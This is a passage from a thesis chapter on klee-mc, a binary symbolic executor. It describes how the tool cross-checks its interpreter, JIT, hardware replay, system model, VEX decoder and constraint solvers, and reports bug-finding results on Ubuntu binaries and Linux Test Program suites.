necessary to replay the system call side effects independent of the system model for
every test case. The log records memory stores and register information similar to
older Unix systems [90], as well as metadata about the system call itself. On test
replay, the program runs on a DBT based on the LLVM JIT and the log is replayed
to recreate the system call’s effects.
Figure 3.4 illustrates the data associated with system call log entry. On the left,
the figure shows a system call record. It begins with a record header, common to
CHAPTER 3. MACHINE CROSS-CHECKING 58
Field Name Description
Record header
bctype Type of record
bctype flags Modifier flags
bcsz Length of record
System Call
bcs xlate sysnr Host syscall number
bcs sysnr Given syscall number
bcs ret Return value
bcs opc Update op. countField Name Description
sop hdr Record header
Memory update operation
sop baseptr Base pointer
sop off Pointer offset
sop sz Update length
Figure 3.4: Test case log record structures for system calls
all log records, which describes the record type, flags that control attributes specific
to that type, and a record length, so unrecognized record types can be skipped.
The system call record type itself holds the system call number, useful for checking
whether replay has gone off course, a translated system call number, for emulation
by the host platform, the call’s return value, provided it’s not symbolic, and the
number of memory updates to expect. These memory updates, following the system
call record, describe a base pointer or system call argument number that should be
updated, along with the length of the update. The update data maps to the concrete
test case’s list of array assignments. If the update length disagrees with the array
length, the test replay reports a system call replay error.
Register Logging . The symbolic executor optionally logs the state’s machine
registers (e.g., rax,xmm0 ) throughout execution. The logged registers record interme-
diate results for fine-grained integrity checking during test replay to catch interpreter
errors close to the point of failure. For every dispatched basic block, the interpreter
appends the emulated register file and a concrete mask, which indicates whether a
register is symbolic or concrete, to the log. Test replay only checks concrete data
against concrete registers; symbolic bytes are ignored.
CHAPTER 3. MACHINE CROSS-CHECKING 59
3.3.2 Operating System Differencing on the System Model
When a program state enters the system model by making a system call, the set of
states that may exit the model should precisely represent every result the operating
system could possibly return. Otherwise, the system model diverges from the modeled
operating system, either introducing side effects never observed in practice, producing
unrealistic tests, or missing side effects, potentially missing large swaths of program
code. We compare the results of symbolic execution of pre-snapshots with the side
effects reflected in post-snapshots to judge the system model’s accuracy.
Model Fidelity
A system model fails to model the operating system’s side effects in possible two ways.
One, the model is overconstrained when missing side effects. Two, the model is under-
constrained when introducing new side effects. These failure modes are orthogonal:
a model can both introduce new side effects and miss legitimate side effects.
Model quality in this sense is easily formalized. Let S(s) be the set of all possible
configurations that a state smay take immediately following a system call to the
operating system. Let M(s) be the set of all possible configurations that a state s
may take immediately following a system call handled by the system model M. The
modelMisoverconstrained when∃x∈S(s) such that x̸∈M (s). The model is
underconstrained the operating system when ∃x∈M (s) such that x̸∈S(s). For a
snapshot pair ( s,s∗), by definition the post-snapshot is a configuration from applying
the operating system, s∗∈S(s).
System Model×Operating System
Every snapshot pair describes side effects of a system call on a process image. To
compare the model with the operating system specification, the pre-snapshot seeds
symbolic execution and the post-snapshot gives expected output. Differences between
the symbolically derived test cases and post-snapshot determine the model’s accuracy.
Figure 3.5 diagrams the process for differencing operating system and model side
effects. First, the pre-snapshot and post-snapshot are differenced to locate system
CHAPTER 3. MACHINE CROSS-CHECKING 60
call side effects. Next, the pre-snapshot is symbolically executed for one system call.
Finally, the side effects from symbolic execution are compared with the side effects
derived from the snapshot pair.
We consider side effects related to register and memory contents. Side effects
are found by differencing snapshot pairs (the pair difference). Pair differencing relies
on the lightweight snapshot structure. Unchanged memory segments are symlinks
and can be skipped. Updated memory segments are byte differenced and modified
addresses are stored in a side effect summary of address ranges A.
Symbolically executing the pre-snapshot produces the model side-effects. The
pre-snapshot is loaded into the symbolic executor with the model configured to exit
immediately after completing a system call. Symbolic execution produces a set of
test casesT. Each test case t∈Tincludes path constraints C(t) (as a set of boolean
bitvector expressions) and a set of updated memory ranges A(t).
The model can be checked for underconstraining and overconstraining through
side effects byAandT, For overconstraining, if for every t∈ T the operating
system update set contains addresses not in the model update set, ∪(A)∩∪(A(t))̸=
∪(A), thentwith the minimal missing locations ( A)−∪(A(t)) represents the model
overconstraining. For underconstraining, if every t∈T has a update address in the
snapshot’s memory space but not the operating system side effect set, ( ∪(A(t))−
∪(A))∩s∗̸=∅, then that address represents an underconstrained side effect.
Unsupported System Calls
For practical reasons, a subset of system calls are left partially or totally unsupported
in the model. First, modeling system calls that are rarely used, perhaps by a handful
of programs, or never observed, has little pay-off. Second, there is an implemen-
tation gap as new system calls and flags as they are added host operating system.
Therefore the system model gracefully handles unsupported system calls. Whenever
a path reaches an unsupported system call number or feature flag, the system model
generates a missing system call report and the path returns from the model with an
unsupported return code.
CHAPTER 3. MACHINE CROSS-CHECKING 61
Figure 3.5: The process for comparing model and operating system side effects.
3.3.3 Execution Testing with Deterministic Test Replay
Test cases made by the symbolic executor serve dual purposes. On the surface, these
tests exercise a target program’s paths. However, treating this generated data as
input for symbolic execution machinery means the executor makes tests for itself.
This testing works by replaying program tests and comparing against prior executor
state by alternating means of execution.
The system has three separate ways to evaluate code to test itself. First, non-
determinism in the interpreter is ruled out by replaying test cases in the interpreter.
Next, semantic differences between the intermediate representation and the interpre-
tation are found by replaying on the JIT executor. Finally, direct hardware replay
detects errors in the machine-code translation. If path passes each level, the inter-
preter transitively matches hardware.
CHAPTER 3. MACHINE CROSS-CHECKING 62
Interpreter×Interpreter
Replaying program paths in the interpreter rules out non-determinism bugs. The
replay process uses the test case as a variable assignment log. Whenever the system
model creates a symbolic array, the interpreter applies the variable assignment from
the test case and advances its position in the test case. Non-determinism in the
interpreter can cause the current variable assignment to have a different name from
the symbolic array or a different size, causing the replay to fail. Although this does
not ensure the interpreter follows the path from the test case, it is a good first
pass; differing paths often have separate system call sequences. Regardless, non-
deterministic paths with the same system call sequences are detected through register
logs in the next section.
Interpreter×JIT
The interpreter and LLVM JIT should have equivalent concrete evaluation semantics.
Since the interpreter and JIT are independent LLVM evaluation methods, the two can
be cross-checked for errors. We cross-check the two by comparing the interpreter’s
register log with the JIT’s register values. The heuristic is that an interpretation
error, whether on symbolic or concrete data, eventually manifests as a concrete error
in the register file. On JIT replay, logged registers marked as concrete are compared
with the JIT registers; a mismatch implies the interpreter or JIT is incorrect and is
reported to the user.
JIT×Hardware
Comparing the JIT and hardware finds translation bugs. Starting from the entry
point, the guest and native process run in tandem. The replay process executes code
one basic block at a time: first through the JIT, then through the native process; the
native process is never ahead of the JIT. Once the basic block is retired by the native
process, the JIT state and native state are cross-checked for equivalence. For speed,
only registers are compared at each basic block. On a mismatch, both registers
and memory are differenced and reported to the user for debugging. Occasionally
CHAPTER 3. MACHINE CROSS-CHECKING 63
Figure 3.6: Symbolic decoder cross-checking data flow.
mismatches are expected due to known translation issues ( §3.4.2); these cases are
ignored by exchanging state between the JIT and hardware.
Hardware is traced by first creating a native process from a program snapshot.
The snapshot is loaded as a native process by forking klee-mc and jumping to the
snapshot’s entry point address. The entry point address is breakpointed so process
control with ptrace starts at the beginning of the program. klee-mc can jump to
the snapshot’s code because it identity maps memory from snapshots; collisions are
rare because the process is mapped to an uncommon address and non-fixed memory
is dispersed by address space layout randomization. Although the native process has
klee-mc in its address space as well as the snapshot, the memory from klee-mc is
never accessed again.
3.3.4 Host CPU and the Machine Code Front-End
Cross-checking third party binaries only finds decoder bugs covered by existing code.
While binaries taken from various environments are one step toward robustness, they
fall short of the darker corners of the decoder — broken opcodes, sequences, and
encodings either rarely or never emitted by compilers. To uncover these aspects of the
decoder, we symbolically generate code fragments then cross-check their computation
CHAPTER 3. MACHINE CROSS-CHECKING 64
between hardware and the JIT.
We generate new programs symbolically as follows. We mark an instruction buffer
as symbolic, feed it to a VEX front-end (denoted guest-VEX) which is interpreted
inside klee-mc . On each path klee-mc explores, the code in guest-VEX transforms
symbolic bytes into constraints that exactly describe all instructions accepted or re-
jected by the path. We call these constraints fragments since they solve to a fragment
of machine code. Fragments follow the validation pipeline in Figure 3.6.
Fragments are generated as follows. A small program, symvex , calls the VEX
decoder with a symbolic buffer. symvex is a standard native binary — it is compiled
with the stock system compiler ( gccin our case) and runs under klee-mc like any
other program. To start fragment generation symvex reads from a symbolic file,
marking a buffer symbolic. symvex then calls the VEX instruction decoder on the
buffer. As the VEX decoder runs (as a guest, under klee-mc ) it mechanically
decodes the buffer into every instruction sequence VEX recognizes.
The length and contents of the buffer were guided by the nature of the x86-64 in-
struction set. It is 64 bytes long with the first 48 bytes marked as symbolic. Since the
maximum length of an x86-64 instruction is 16 bytes, the buffer fills with a minimum
of three symbolically decoded instructions. To keep the decoded instructions from
exceeding buffer capacity, the final 16 bytes are fixed as single-byte trap instructions;
falling through to the tail causes a trap.
We use a small harness program ( xchkasm ) to natively run the putative code pro-
duced by solving a fragment’s constraints. An optional register file may be provided
by the user to seed the computation (by default, a register file filled 0xfe is used).
To protect itself from errant code, the harness establishes a sandbox by forking a
ptrace d process. A small assembly trampoline bootstraps native execution. It loads
the register state from memory into machine registers and jumps to the code frag-
ment. Since few fragments contain jumps, fall-through code is caught by trap opcode
padding. If a fragment makes a system call, it will be trapped by ptrace . Unbounded
execution caused by stray jumps is rarely observed but can be caught with a watchdog
timer if the need ever arises.
Concrete register files are insufficient for testing fragments which contain jumps
CHAPTER 3. MACHINE CROSS-CHECKING 65
x86-64 VEX IR
rol rdi,0x3
rol rdi,0xd
nops
jc 0xffffffffcd0ccd00PUT(RIP) = 0x40002E
if (64to1(
amd64g calculate condition[mcx=0x13](
0x2,0x28,t27,0x0,t35)))
goto 0xFFFFFFFFCD0CCD00
goto 0x400034
Constraints
(Eq5 (Read w64 CC OP reg ) )
(Or(Extract 0
(Shl w64
N0 : (Orw64
(Shl w64 ( ReadLSB w64 r d i reg ) 3)
(ZExt w64 ( Extract w3 5 ( Read w8 ( r d i +7) reg ) ) ) )
13))
(Extract 51 N0) )
Figure 3.7: Symbolic register file derived constraints to trigger a conditional jump.
or other value-dependent execution. For example, computing condition flags relies on
an out-call to special, complicated, VEX library bitcode to find the flags on demand.
Figure 3.7 illustrates the effect of conditional coverage. To address this issue, we also
run fragments through the symbolic executor with a symbolic register file to explore
the paths through these helper functions, finding solutions for register files which
satisfy the conditions.
3.3.5 Constraint Validity for Expressions and Solvers
The values that symbolic data can take on a given path are represented using symbolic
expressions, which describe the effects of all operations applied to the data. The
constraint solver ultimately consumes these expressions as queries , typically when
resolving branch feasibility and to find concrete assignments for test cases. klee-mc
serializes queries into the SMTLIB [12] language and so expressions correspond to a
subset of SMTLIB.
CHAPTER 3. MACHINE CROSS-CHECKING 66
Solver×Solver
An efficient solver is a stack of query processing components terminated by a full the-
orem prover. These components include query filters, incomplete solvers, and caches.
Since the stacks are non-trivial, the klee-mc system uses a debugging technique from
klee to cross-check solvers during symbolic execution.
Solvers are checked with a dual solver at the top of the solver stack. The dual
solver passes every query to two separate stacks, then checks the results for equality.
If the results do not match, then one solver stack must be wrong.
Running two separate solvers is expensive. For instance, cross-checking a cache
with a bare theorem prover would recompute every query that the caching would oth-
erwise absorb. Additionally, solver bugs always reappear during path reconstruction,
so checking for solver bugs can be deferred to path replay. In practice, the solver
cross-checker detects unsound reasoning arising when developing solver components
and optimizations.
klee-mc supports arbitrary solvers by piping SMTLIB queries to independent
solver processes. This means klee-mc avoids specific library bindings and therefore
submits text-equivalent queries to distinct SMT solvers. This is important because
subtle differences in bindings and solver-specific optimizations can introduce bugs for
one solver but not another. Although piping SMTLIB queries incurs an IPC penalty,
using a solver as a library can ultimately impact stability of the system (e.g., STP
was notorious for stack overflows), so there is impetus to use independent processes.
Expression×Expression×Solver
klee-mc builds expressions using an expression builder . Given the expense of inter-
acting with the constraint solver, a significant portion of this builder code focuses on
translating expressions to more efficient (typically smaller) but semantically equiv-
alent ones, similar to peephole optimization and strength-reduction in a compiler
backend. The ideal replacement produces a constant.
Expression optimizations are checked for errors at the builder level with a cross-
checked expression builder. Figure 3.8 illustrates the process of cross-checking two
CHAPTER 3. MACHINE CROSS-CHECKING 67
Figure 3.8: Cross-checking two expression builders.
expression builder stacks. The cross-checked expression builder creates the desired
expression (subtracting x&0xff fromx) once using a default, simple builder ( x−
x&0xff ), then once again using the optimized builder ( x& ̃0xff ). Both expressions
are wrapped in an equality query and sent to the constraint solver to verify equivalence
through logical validity. If the two expressions are found to be equivalent, the result
of the optimized builder is safe to return. Otherwise, the system reports an expression
error and the builder returns the default expression.
For efficiency, we only cross-check “top-level” expressions, i.e., expressions not
created for the purpose of another expression. In addition, before invoking the con-
straint solver, a syntactic check is performed to see if both expressions are identical.
If so, the solver call is skipped, reducing overhead by an order of magnitude or more.
Special care must be taken to avoid recursion in the solver but maintain soundness.
Recursion arises from the solver building expressions, such as by applying strength
reductions or testing counterexamples. To avoid an infinite loop from the solver
calling back into itself when building an expression, the cross-checked expression
builder defers in-solver validations to the first expression created outside the solver.
Expression Rules ×Solver
In addition to hard-coded expression builders, the system uses soft expression re-
duction rules derived from program traces [113]. These rules (e.g., a→b) describe
templates for translating larger expression structures ( a) to equivalent shorter expres-
sions (b). Soft rules have the advantage that the expression templates are instantiable
into actual expressions. Hence, a rule a→bis verifiable with a constraint solver by
testing the validity of (= a b). Furthermore, the template expressions provide real-
istic seed expressions which are useful for expression fuzzing.
CHAPTER 3. MACHINE CROSS-CHECKING 68
3.4 Implementation
This section describes implementation details necessary for cross-checking with bit-
equivalent under a binary symbolic executor. Left untended, bit-equivalence breaks
under non-determinism. The system handles this non-determinism through static
and dynamic mechanisms. The static approach models non-deterministic features
with deterministic replacements. The dynamic approach detects and repairs non-
determinism as it is observed.
3.4.1 Static Non-determinism
For bit-level reproducible replay, all sources of non-determinism in a program must
be ruled out. As stated in Section 3.3.1, the system call layer is totally modeled in the
interpreter and side effects are logged. However, several sources of non-determinism
need special care beyond register and memory side effect logging:
rdtsc . Reads from a system timestamp counter. The value is hard-wired to 1
by the JIT. For cross-checking with hardware, the instruction is detected and the
mismatch overwritten through fix-ups ( §3.4.2).
mmap . Special care is taken to rewrite mmap calls to reuse the addresses given by
the interpreter. Otherwise, the operating system could allocate at a different base
address and violate pointer equivalence.
VDSO . A few Linux system calls (e.g., clock gettime ) have a fast-path through
the VDSO library. These system calls access special read-only system pages (the
vsyscall region) with memory mapped timers. No system calls are dispatched so it
is difficult to account for these accesses on hardware or model the side-effects. Instead,
each guest process’s VDSO library is overwritten with a custom VDSO library that
uses slow-path system calls instead.
3.4.2 Dynamic Non-determinism
Machine instruction translation occasionally fails to match hardware in such a way
that is either difficult or impossible to correct a priori. Although the translation
CHAPTER 3. MACHINE CROSS-CHECKING 69
can be plainly wrong by diverging from the architectural specification, some in-
struction results may be undefined, micro-architecture dependent, or defined as non-
deterministic. When the system encounters a problematic instruction, it corrects the
mismatch with fix-ups that replace bad values with expected values. The following is
a partial list of fix-ups:
•rdtsc : In native execution, the opcode is caught by single-stepping instructions,
and a constant is injected into the native register in place of a timestamp.
•cpuid : stores processor information into registers. VEX returns a description
that matches its feature set, but pretends to be a genuine CPU (e.g., an Intel
Core i5). To fix up the native process to match the guest, the opcode is caught
when stepping and overridden to use the VEX description.
•pushf – Stores ptrace control information to the stack. Single stepping the
native process with ptrace is based on a processor feature which requires a
trap flag to be set in the eflags register. VEX, on the other hand, is unaware.
Hence, the two states will never have equal eflags registers. Our solution gives
preference to running applications without single-stepping: the native opcode
is caught and its result overridden to mask away the flag.
•bsf,bsr– The VEX IR overwrites the top half of the 64-bit register for the
32-bit variant of these instructions. The native register value is copied to the
affected JIT register.
3.5 Experiments and Evaluation
This section reports measurements and faulty behaviors from running klee-mc .
First, we show the system’s ability to cope with binary diversity by testing over
ten thousand Linux binaries. Next we find system modeling differences derived by
comparing operating system calls and symbolic system model side-effects from host
execution traces. Finally, we check core interpreter functionality by verifying soft ex-
pression reduction rules and showing run-time bugs in hard-coded expression builders.
CHAPTER 3. MACHINE CROSS-CHECKING 70
3.5.1 Linux Program Test Cases
klee-mc is designed to find bugs in user-level binary programs. The system is mature
enough to construct test inputs that reliably crash programs. Regardless of this initial
success, the integrity mechanisms detect critical bugs which still threaten the quality
of symbolic execution.
Types of Mismatches
We recognize three error modes which roughly correspond to the symbolic interpreter,
machine-code translation, and hardware respectively:
System call mismatch. Either the system call log is depleted early or the
sequence of system calls diverges from the log on replay. This exercises replay deter-
minism and coarsely detects interpreter bugs.
Register log mismatch (Interpreter ×JIT) . The interpreter’s intermediate
register values conflict with the JIT’s register values. This detects symbolic interpre-
tation bugs at the basic block level.
Hardware mismatch (JIT ×HW) . The JIT’s intermediate register values
conflict with host hardware register values. This detects machine-code translation
bugs otherwise missed by register logging.
Testing Ubuntu Linux
We tested program binaries from Ubuntu 13.10 for the x86-64 architecture. Each
program was symbolically executed for five minutes, one to a single core of an 8-core
x86-64 machine, with a five second solver timeout. The symbolic execution produced
test cases which exercise many program paths, including paths leading to crashes.
These paths were then checked for computational mismatches against JIT replay,
register logs, and native hardware execution.
Table 3.1 lists a summary of the test results. Crash and mismatch data are given in
terms of total tests along with unique programs in parentheses. In total we confirmed
4410 pointer faults (97%), all divide by zeros, and 38 (30%) decode and jump errors.
Surprisingly, the overlap between mismatch types was very low– 3.8% for hardware
CHAPTER 3. MACHINE CROSS-CHECKING 71
Programs 14866
Tests 500617
Solver Queries 44.8M
Test Case Size 114MB
Register Log Size 235GB
Pointer Faults 4551 (2540)
Divide By Zero 109 (84)
Decode / Bad jump 126 (39)
Unsupported Syscalls 80
Fix-Ups 742 (48)
Syscall Mismatch 4315 (390)
Interpreter×JIT 2267 (214)
JIT×HW 4143 (201)
Table 3.1: Mass checking and cross-checking results on Ubuntu Linux programs.
and register logs and 11% for register log and system call mismatches. This suggests
each checking mechanism has its own niche for detecting executor bugs.
Example Mismatch
Figure 3.9 gives an example deep translation bug with a small assembly code snippet
detected through a register log mismatch. The assembly code clears the 128-bit xmm0
register with xorpd , computes the double-precision value the division 0 .0/0.0, storing
the result to the lower 64-bit position in xmm0 . The machine code front-end translates
and optimizes the instructions to putting the value (0,0.0/0.0 into the xmm0 register.
Next, converting to LLVM causes the LLVM builder to constant-fold 0.0/0.0 into
0x7ff80..0 (nan). Symbolically executing the LLVM code gives (nan, 0) , running
the LLVM code with the JIT gives (0, nan) , and the original instructions give (0,
-nan) natively. The symbolic executor diverges from the JIT because it builds the
LLVM constant data sequence (0, nan) backwards. The JIT diverges from hardware
because LLVM constant-folding computes 0.0/0.0 asnaninstead of -nan . Fixing the
symbolic executor simply requires swapping the concatenation order. Since LLVM
causes the JIT×hardware divergence, the divsd %xmm0, %xmm0 is included as a safe
fix-up so the mismatch is repaired during cross-checking.
CHAPTER 3. MACHINE CROSS-CHECKING 72
Assembly
xorpd % xmm0, % xmm0
divsd % xmm0, % xmm0
VexIR
Put (224) <−Iop Div64F0x2 ( 0 : V128 , 0 : V128)
LLVM Code
%ctx = b i t c a s t %guestCtxTy ∗%0 to<2 x double >∗
%” X M M[ 0 ] ” = getelementptr <2 x double >∗%ctx , i32 14
s t o r e<2 x double >
<double 0x7FF8000000000000 , double 0.000000 e+00 >,
<2 x double >∗%” X M M[ 0 ] ”
Register Values
SymEx XMM0: (0x7ff8000000000000, 0)
JIT XMM0: (0, 0x7ff8000000000000)
Hardware XMM0: (0, 0xfff8000000000000)
Interpreter Bug
ref<Expr>ConstantExpr : : createSeqData (
llvm : : ConstantDataSequential ∗v )
{. . .
f o r ( unsigned i = 0 ; i <elem c ; i++){
ref<ConstantExpr > ce ;
. . .
cur v = ( i == 0) ? ce : cur v−>Concat ( ce ) ;}
return cur v ;}
Figure 3.9: A broken floating-point division sequence.
Register Logs
Register log can consume excessive memory because the executor stores a new register
set for every basic block. In the interpreter, the log is stored in memory until path
termination, where it is written, compressed, to the file system. Since the memory
overhead makes logging impractical during the symbolic execution run, register logs
are recreated through test case replay. Figure 3.10 shows the time it takes to recon-
struct a register log from a test case. Since paths tend to be short, approximately 90%
of test cases can have their register logs reconstructed in under ten seconds. Since
a few missing logs are of little importance, the process memory was limited so the
CHAPTER 3. MACHINE CROSS-CHECKING 73
 0 10 20 30 40 50 60 70 80 90 100
 0.1  1  10  100  1000Cumulative Percent
Register Log Generation Time (seconds)Test Register Log Generation Time CDF
Figure 3.10: Cumulative time distribution to build register logs for each test case.
interpreter would terminate, thus losing the log, without exhausting all total mem-
ory. Offline reconstruction is a good trade-off; complicated efficient online logging is
unnecessary because the data can be quickly rebuilt from test cases.
Figure 3.11 plots the number of basic blocks checked for each test case. As ex-
pected, there is a linear relationship between number of basic blocks checked and
time to check the entire test case. The most frequent tests have fewer basic blocks.
The longest logs check more than a million basic blocks, approaching the executor
memory limit with more than a gigabyte of log data.
3.5.2 Machine Code Front-End
We ran klee-mc on 39 cores of a cluster for two hours, where each core explored a
different partial path in the VEX x86-64 instruction decoder. This method generated
a total of 40,270 test fragments (both decodable and undecodable). Conservatively,
this gives 17 code fragments per CPU-minute. Generated code fragments are fed into
the JIT and cross-checked with the native machine using a fixed concrete register file.
The system solves constraints to generate fragments of concrete code, then runs
them natively. If VEX rejects a fragment, no solution should fault. Conversely, if
CHAPTER 3. MACHINE CROSS-CHECKING 74
01e62e63e64e65e66e67e68e6
 0  5  10  15  20  2502.0e54.0e56.0e58.0e51.0e61.2e6Checked Basic Block Frequency
Checked Basic Blocks in Test Case
Time to Check (seconds)Times for Checking Register Log with JIT
Frequency
Test Case
Figure 3.11: Number of basic blocks checked against register log as a function of time.
Instruction Bytes Problem
nop esp 0f 19 cc vex amd64->IR: unhandled instruction bytes
rex.w popfq 48 9d Assertion ‘sz == 2 || sz == 4’ failed.
fs stosb 66 aa disAMode(amd64): not an addr
rex.w ss sbb eax,0xcccccccc 48 36 1d cc cc cc cc cc Keeps top half of rax
rex.w ss mov ch,0xcc 48 36 b5 cc Stores to first byte of rbp
rol rax, 0x11 48 c1 c0 11 Sets undefined overflow flag
shl cl, r9 49 d3 e1 Sets adjust flag
Table 3.2: Valid x86-64 code causing VEX to panic, corrupt register state, or invoke
divergent behavior.
CHAPTER 3. MACHINE CROSS-CHECKING 75
Bug Class Occurrences Error Types
Corrupted Register 1739 78
Assert Failures 5643 4
False Reject 747 3
False Accept 145 1
Total 8274 86
Table 3.3: VEX decoder errors found with a static register file.
accepting, every solution should run natively without raising an illegal instruction
violation. Further, any non-faulting sequence should yield the same register values at
the end. As expected, we found numerous places where these checks failed, indicating
bugs in VEX. Table 3.2 shows the flavor of opcodes and bugs which come from
symbolically generated fragments.
No special effort is made to support memory accesses, so most trap. When a
fragment makes an access to an invalid pointer, the harness would catch the access,
log the address and value (if a write), patch in a return value (if a read), then return
control to the fragment. To keep results pure, we discard from consideration any
code fragment which causes a memory access violation. Despite this drawback we
find many decoding errors.
Cross-checking symbolically generated code with a concrete register file was sur-
prisingly effective: 8,274 out of the forty-thousand code fragments produced mis-
matches. This number is after filtering errors from bad jumps, bad memory accesses,
and obvious unhandled cases in our JIT dispatcher. We crudely culled duplicate bugs
by binning all errors that had the same unique register values (but different instruc-
tions), which brought the total number down to 86 errors. A gross classification of
the bugs uncovered by the concrete register file is listed in Table 3.3. The bugs are
classified into four categories:
1.Corrupted Registers : A register in the native state disagrees with its guest
counterpart after running the fragment. Mismatches stem from overzealous
truncation, mixed up operands, and nondeterminism.
2.Assert Failures :assert failures thrown within the VEX decoder. The binned
CHAPTER 3. MACHINE CROSS-CHECKING 76
number is very conservative since we only count unique assertion messages (i.e.,
the same error message twice is one error counted); VEX has few messages for
rejections, so distinct opcodes are rejected with the same message.
3.False Reject : VEX rejects an instruction sequence which native hardware
accepts. This number is conservative. Unique occurrences are counted based on
the signal returned by the ptrace ’d process (e.g., SIGBUS ,SIGTRAP ,SIGSEGV ); a
correctly rejected instruction would return the illegal instruction signal, SIGILL .
We excluded 1,607 code fragments from the false reject count because raise
SIGSEGV as a consequence of the incomplete memory model.
4.False Accept : VEX accepts an instruction which is illegal on the host machine.
Only SIGILL is expected; this test yields one “unique” mismatch.
Of the four classes, we believe corrupted register errors are most serious. If a
corrupted register is live after completion of the instruction, it will introduce garbage
into the computation. Occasionally the bogus computation will fail fast (e.g., the
corrupted register was a pointer). Without cross-checking, the computation may
proceed unhindered for some time, making the root cause uncertain.
We next evaluate the propensity toward false-negatives in concrete tests by recheck-
ing matching fragments with symbolically derived concrete register files. From 11,379
fragments that cross-checked successfully, klee-mc generated 570,977 register files
designed to exercise all paths in the fragments. Of the 11,379 fragments passed
by concrete checking, 346 failed under symbolic registers. Errors stemmed from new
paths, condition codes, and a mishandled oropcode masked by our choice of concrete
register values.
3.5.3 System Model
Systematically applying model differencing detects both underconstrained and over-
constrained system calls. To strenuously test the symbolic model, we used the system
call test cases from the Linux Test Program [88] project (LTP). Although the system
model occasionally diverged from the host, the differences were modest.
CHAPTER 3. MACHINE CROSS-CHECKING 77
Type System Calls Test Cases
Underconstrained 11 133
Overconstrained 34 1586
No difference 152 39360
Total 201 41079
Table 3.4: Comparison between model and operating system with LTP suite.
Each LTP program was snapshotted for up to one hundred system calls. LTP
program demanding root access were ignored. To test the executor’s system model,
each pre-call snapshot was symbolically executed to path completion for the call. This
covers all possible results the system model could give for the snapshot’s system call.
Next, the side-effects, from the pre and post snapshots and the system model, were
compared for overconstrained and underconstrained modeling. Table 3.4 summarizes
the model differencing data from the LTP programs. The results suggest that the
model tends to be conservative, opting to leave memory untouched. It should be
noted that LTP is not a complete test suite and therefore does not represent a full
set of possible program-operating system interactions. For instance, LTP makes no
attempt to seriously test the notoriously overloaded ioctl call (likewise, klee-mc
makes little attempt to accurately model ioctl ).
Overconstrained system model calls, those that left some data untouched com-
pared to the host, typically flagged obviously missing modeling. Most calls were
unimplemented or incomplete with remarks in the comments. In one case ( getdents ),
the complete system call was commented out in favor of an incomplete version, for rea-
sons unknown. Five system calls (not counted in the table) were accurately modeled
(e.g., getpid ), but were occasionally flagged as overconstrained because of system
modifications to the read-only vsyscall page.
Underconstrained system calls, those that touched excess data, flagged environ-
mental differences between the host and the symbolic system model. Often the system
model fills in structures for resources that missing from the host system. As an exam-
ple, the model (as a heuristic) permits failures of lstat only occasionally; otherwise,
thestat structure is unconditionally updated.
CHAPTER 3. MACHINE CROSS-CHECKING 78
 0 200 400 600 800 1000 1200 1400 1600
 0  5  10  15  20Cumulative Verification Time
Time to Verify Individual Rule (seconds)Expression Rule Verification Duration
Figure 3.12: Time to verify machine-derived rewrite rules.
3.5.4 Expressions
Testing Rules
Thousands of expression reduction rules in klee-mc are verified using the constraint
solver. Although rule verification is offline, it is still important that soft rules can be
verified within a reasonable about of time. Figure 3.12 shows the time to test the soft
rule set currently used by klee-mc . The entire set of 19444 rules took under half an
hour to verify with the STP constraint solver. All rules are verifiable in under thirty
seconds with a median time of less than a tenth of a second.
On the other hand, testing the rules with Z3 [49] led to other conclusions. Indi-
vidual rules could take more than a minute to confirm, far longer than STP’s worst
case; in total, Z3 took 11 .6×as long as STP to verify the rule set. Furthermore, Z3
handles undefined division edge cases differently from STP, causing it to reject 27
otherwise acceptable rules. Figure 3.13 shows an example rule verification expression
that is valid in STP but contingent under Z3. The trace-derived rule states the 5th
byte of four 64-bit divides of a zero-extended 32-bit value ( x) by any value ( c) will
always be zero. Technically, dividing by zero could result in a value greater than the
CHAPTER 3. MACHINE CROSS-CHECKING 79
(Eq0 (Extract w8 40
(UDiv w64 ( UDiv w64 ( UDiv w64 ( UDiv w64
(ZExt w64 ( ReadMSB w32 0 x ) )
N0 : (ReadMSB w64 0 c ) )
N0) N0) N0 ) ) )
Figure 3.13: Translation rule test with undefined result.
numerator, but this seems unnecessarily pedantic.
Hard-coded Builders
We generated expressions to cross check both using actual programs and by using
a simple “fuzzer” to construct them synthetically. Cross-checking the former found
errors in both the optimizing and in the na ̈ ıve builders, cross checking fuzz-produced
expressions found an error in LLVM itself. We discuss a few in detail.
Basic Builder. Although the cross-checker is intended to find bugs in the opti-
mizing expression builder, it still found an error in the simpler builder. Both builders
attempted to replace an equality check of two identical constant values with 1(true),
the optimizing builder correctly, the simple builder incorrectly. The latter gener-
ated the boolean constant using an optimistically-named helper function, True() .
Unfortunately, True() was an exact copy of its negated counterpart and presumed
paste progenitor, False() . One might assume defining true as false would lead to
immediate errors, but only one line called the function, allowing its effects to go
unnoticed.
Optimizing Builder. The cross-checker immediately found several bugs, in-
cluding a truncation error in the constraint marshaler and unsupported expression
combinations. One of the most serious was a buggy routine to replace multiply op-
erations (expensive in constraint solving) with shifts and adds. Figure 3.14 shows
a subset of the information the cross checker reports — the expression that failed
cross-checking, a concrete assignment which will make both routines differ, and the
concrete values they produce. The broken multiplication algorithm relied on compli-
cated bit tricks broken beyond repair; it was rewritten from scratch to use Booth’s
CHAPTER 3. MACHINE CROSS-CHECKING 80
(Eq(NotOptimized w128
(Mul w128 0 x1845c8a0ce512957
N0 : ( SExt w128 ( ReadLSB w64 88 statbuf8 ) ) ) )
(Sub w128 0
(Add w128 ( Add w128 ( Add w128 ( Add w128
(Shl w128 N0 59)
(Shl w128 N0 46))
(Shl w128 N0 30))
(Shl w128 N0 25))
(Shl w128 N0 0 ) ) ) )
Counterexample: statbuf8[95] = 0x1 (N0 = 0x1000000000000000)
Oracle Cex Eval: 0x001845c8a0ce51295700000000000000
Test Cex Eval: 0xfff7ffbfffbdffffff00000000000000
Figure 3.14: Bad multiply caught by cross-checking.
const ZExtExpr∗zr ,∗z l ;
i f( ( zr = dyn cast<const ZExtExpr∗>(r ) ) &&
( z l = dyn cast<const ZExtExpr∗>( l ) ) &&
zr−>getKid(0)−>getWidth ( ) ==
zl−>getKid(0)−>getWidth ( ) ){
return MK SEXT(
MKSUB( zl−>getKid ( 0 ) , zr −>getKid ( 0 ) ) ,
zl−>getWidth ( ) ) ; }
Figure 3.15: A faulty hard-coded optimization
method.
Faulty optimizations occasionally creep into the code, but the cross-checker helps
flag the contamination. Figure 3.15 lists one such optimization. The optimization
is meant to optimize subtraction expressions. When the arguments xandyare
zero-extended to nbits, (−(ZExtx n) (ZExty n)), the code replaces the two zero-
extensions with a single n-bit sign-extension, ( SExt (−x y)n). This reasoning is
